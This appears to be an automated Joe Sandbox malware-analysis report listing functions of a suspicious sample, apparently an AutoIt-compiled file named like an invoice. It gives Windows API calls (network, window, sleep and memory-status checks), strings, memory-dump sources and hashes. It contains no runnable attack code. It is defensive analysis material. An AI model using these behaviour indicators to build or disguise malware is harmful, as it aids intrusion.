                                    Function 00F4219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00F4219B
                                    • GetDC.USER32(00000000), ref: 00F421A5
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F421B1
                                    • ReleaseDC.USER32(?), ref: 00F421D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 705ad1676b33f4eef8180a5c8b95e3a847866febbf91b045a30066af33fc87a7
                                    • Instruction ID: 10689c7e1d29e24f3587e2c274b43af67476036cb9c26e2bd666d79d25e8a5fd
                                    • Opcode Fuzzy Hash: 705ad1676b33f4eef8180a5c8b95e3a847866febbf91b045a30066af33fc87a7
                                    • Instruction Fuzzy Hash: EDE012B5800208AFCB11AFB0C8086AD7BF1EF5C310F108229F95AE7260EB789155BF40
                                    Function 00F79A72 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F57652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F5758C,80070057,?,?), ref: 00F57698
                                    • _memset.LIBCMT ref: 00F79B28
                                    • _memset.LIBCMT ref: 00F79C6B
                                    Strings
                                    • NULL Pointer assignment, xrefs: 00F79CF0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$lstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1020867613-2785691316
                                    • Opcode ID: 05508d7e38aea3131168fafee41fc1d3bdbe949035032d86bdc4cf8fb0d6ae86
                                    • Instruction ID: 77ad754584e4c1ab6d61e439d3d89f2daaaf387c5a382ffcd2a7cd7c530e3986
                                    • Opcode Fuzzy Hash: 05508d7e38aea3131168fafee41fc1d3bdbe949035032d86bdc4cf8fb0d6ae86
                                    • Instruction Fuzzy Hash: AC913B71D00219ABDF10DFA4DC81EDEBBB9AF08710F20815AF519A7281DB755A44EFA1
                                    Function 00F5B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00F5B981
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: 8a1b456aafdae9c059022fef6f07fd3eb8106c31b6a9199f6535b2cb795ff6fc
                                    • Instruction ID: 31bcbe2f925f69e413b3b0479f1eb77bd93c0c19b2ae01fde74670588fc6c04d
                                    • Opcode Fuzzy Hash: 8a1b456aafdae9c059022fef6f07fd3eb8106c31b6a9199f6535b2cb795ff6fc
                                    • Instruction Fuzzy Hash: A3914971600601AFDB24CF24C885B6AB7E8FF48712F20856EEE4ACB691DB70E845DB50
                                    Function 00F6B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • __wcsnicmp.LIBCMT ref: 00F6B298
                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F6B361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                    • String ID: LPT
                                    • API String ID: 3222508074-1350329615
                                    • Opcode ID: bac4161de45242df0142422498c39eca4e379402057966f0ffe1b2e8cee8853e
                                    • Instruction ID: d0f3877899a606649f90e3b6e1cd63e0fd056ab1f0af3dc15196b4213a33dd16
                                    • Opcode Fuzzy Hash: bac4161de45242df0142422498c39eca4e379402057966f0ffe1b2e8cee8853e
                                    • Instruction Fuzzy Hash: B8618276E00215AFCB14DF94C895EAEB7B4EF08310F11415AF946EB391DB74AE84EB50
                                    Function 00F12AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 00F12AC8
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F12AE1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: 2d86d500486c9d43897385b682b76add54a4ad76adec08b053bcfc5f6df6ab8e
                                    • Instruction ID: 19f86591a911e18d391462928f21ac1257d71bf96100f1b03fa106612a54d507
                                    • Opcode Fuzzy Hash: 2d86d500486c9d43897385b682b76add54a4ad76adec08b053bcfc5f6df6ab8e
                                    • Instruction Fuzzy Hash: CB515A715187489BD320AF14DC85BAFB7E8FFC4310F42485DF2D9410A2EBB49529EB26
                                    Function 00F699BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F0506B: __fread_nolock.LIBCMT ref: 00F05089
                                    • _wcscmp.LIBCMT ref: 00F69AAE
                                    • _wcscmp.LIBCMT ref: 00F69AC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: c803e51a0c35844187085f22ff6e4efc93caa3213c4d33b1b7543501e01b7063
                                    • Instruction ID: 26bc5a058e1d3d89cc7a59c05f640ea3c526386c8682dc1fdc7cf687afbd7b2a
                                    • Opcode Fuzzy Hash: c803e51a0c35844187085f22ff6e4efc93caa3213c4d33b1b7543501e01b7063
                                    • Instruction Fuzzy Hash: 6B41DB71A0461ABADF209AA4DC45FEFB7BDDF45714F000069F904E71C1D6B99A04ABA1
                                    Function 00F72882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F72892
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F728C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 737bee99ef28111e68b0d9a1ff728d9c86342ed158180948963514739f75e16b
                                    • Instruction ID: cb55d026e351fe9ffc03dc887c32d642595bd8b53d6738916af5154ccc9299da
                                    • Opcode Fuzzy Hash: 737bee99ef28111e68b0d9a1ff728d9c86342ed158180948963514739f75e16b
                                    • Instruction Fuzzy Hash: 29315A71D01219AFDF01EFA0CC85EEEBFB8FF08310F14406AF904A6165DA355A16EB60
                                    Function 00F86CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00F86D86
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F86DC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: 25b0751f425e6e7ee46d65aba77d94f895bf83924d2f99584c22be3e7b399953
                                    • Instruction ID: e408711a0d62c907bdf43e132f501a9cab337fcac58475a1b4a3a1813cc5e77e
                                    • Opcode Fuzzy Hash: 25b0751f425e6e7ee46d65aba77d94f895bf83924d2f99584c22be3e7b399953
                                    • Instruction Fuzzy Hash: AA319E72600204AEDB10AF28CC80BFB73A8FF48720F108619F8A5D7190DA35AC91EB60
                                    Function 00F62D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F62E00
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F62E3B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 970d10eae453c54416d3a12726681f8b861b0b821be7918b12bffc419e264281
                                    • Instruction ID: 2149b2c884bee0e3d23e037e58561d0d0badcf39f592e76c291d989c9386dcce
                                    • Opcode Fuzzy Hash: 970d10eae453c54416d3a12726681f8b861b0b821be7918b12bffc419e264281
                                    • Instruction Fuzzy Hash: 8C31F531E00709ABEB64CF48D945BEEBBB9FF15320F140439E985961A1D7759944EB10
                                    Function 00F86943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F869D0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F869DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: c7ea3d9b1ce6e9660e128b150c56d53b84ae508770ebe8bb1b34cde1373659fe
                                    • Instruction ID: 25c25b2cedfb91faedd310fabbfe5a628925609f39320b0ad551c29a9565b493
                                    • Opcode Fuzzy Hash: c7ea3d9b1ce6e9660e128b150c56d53b84ae508770ebe8bb1b34cde1373659fe
                                    • Instruction Fuzzy Hash: 4F11B271B002086FEF11AF14CC81EFB376AEB883A4F114124F958DB2D0D6759C51A7A0
                                    Function 00F86E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
                                      • Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
                                      • Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91
                                    • GetWindowRect.USER32(00000000,?), ref: 00F86EE0
                                    • GetSysColor.USER32(00000012), ref: 00F86EFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 45e4badc1872ffa5235240cd123f1bd9dcbbcc76469b69ad38d9f2c0ce188f5e
                                    • Instruction ID: 590c3f13508df59ad3529ae4f4f1df628627d224a274587a2ded17ff06d640ba
                                    • Opcode Fuzzy Hash: 45e4badc1872ffa5235240cd123f1bd9dcbbcc76469b69ad38d9f2c0ce188f5e
                                    • Instruction Fuzzy Hash: 16212972A10209AFDB05EFA8DD45EFA7BB8FB08314F044629F955D3250E734E861AB50
                                    Function 00F86B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 00F86C11
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F86C20
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: a560f1527831b37bdba38d1165e96b5314f89e78d7735eb028cf0e3ff35f7f12
                                    • Instruction ID: 6b5dd121f164ec27e6d8664fa1e25f8d571da344182028d38dd88c81e1c6dfb1
                                    • Opcode Fuzzy Hash: a560f1527831b37bdba38d1165e96b5314f89e78d7735eb028cf0e3ff35f7f12
                                    • Instruction Fuzzy Hash: 2E119A71901208AFEB10AF649C42EFA3769EB45378F204724F961D71E0C735DC91BB60
                                    Function 00F62E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F62F11
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F62F30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: f540e47e835100ddf671e05dca0cccaa7c1e6aee0d610a981b6f5643d1be553a
                                    • Instruction ID: d796f67605f89003df696b2a463fe92e2f18f19628bd682475d11d842a9136a6
                                    • Opcode Fuzzy Hash: f540e47e835100ddf671e05dca0cccaa7c1e6aee0d610a981b6f5643d1be553a
                                    • Instruction Fuzzy Hash: 1E11E232E05518ABCB60DB58DC04FA977B9EB11320F0800B5EC54E72A1D7B2AE04E791
                                    Function 00F724CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F72520
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F72549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: a98a6bb52266da7feaf10bb4b835ccc9cf2d5e93aa741980e34d6eb71dca41be
                                    • Instruction ID: 62406f6cfad992c7c94d3d927934278144e0d9a3d9761988ccd686b7675c5ffe
                                    • Opcode Fuzzy Hash: a98a6bb52266da7feaf10bb4b835ccc9cf2d5e93aa741980e34d6eb71dca41be
                                    • Instruction Fuzzy Hash: E311E071900225BEEB248F618C98EFBFF68FB06361F10C12BF90942040D2706944EAE2
                                    Function 00F780A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F7830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00F780C8,?,00000000,?,?), ref: 00F78322
                                    • inet_addr.WS2_32(00000000), ref: 00F780CB
                                    • htons.WS2_32(00000000), ref: 00F78108
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 2496851823-2422070025
                                    • Opcode ID: a3f07011db04372692de48c9776332b19e80164f1a60f1f587fd3fd9bd3f86d4
                                    • Instruction ID: 74b891afe1a1de66e1dc8061315775e6d145af9ee800caeaac15a490b1720c8d
                                    • Opcode Fuzzy Hash: a3f07011db04372692de48c9776332b19e80164f1a60f1f587fd3fd9bd3f86d4
